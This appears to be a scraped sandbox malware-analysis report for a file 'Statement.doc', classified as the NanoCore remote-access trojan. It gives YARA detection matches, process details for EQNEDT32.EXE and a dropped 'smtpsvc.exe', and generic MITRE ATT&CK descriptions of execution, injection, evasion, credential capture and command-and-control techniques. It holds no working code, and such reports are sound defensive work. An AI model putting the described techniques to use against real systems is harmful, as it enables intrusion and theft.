Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Analysis Process: EQNEDT32.EXE PID: 2176 Parent PID: 584

General

Start time:	19:13:00
Start date:	27/01/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: smtpsvc.exe PID: 1976 Parent PID: 3012

General

Start time:	19:13:01
Start date:	27/01/2021
Path:	C:\Program Files (x86)\SMTP Service\smtpsvc.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\SMTP Service\smtpsvc.exe
Imagebase:	0x150000
File size:	1973760 bytes
MD5 hash:	10D30AD1922421E73E133AD020DF424F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Statement.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: NanoCore

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre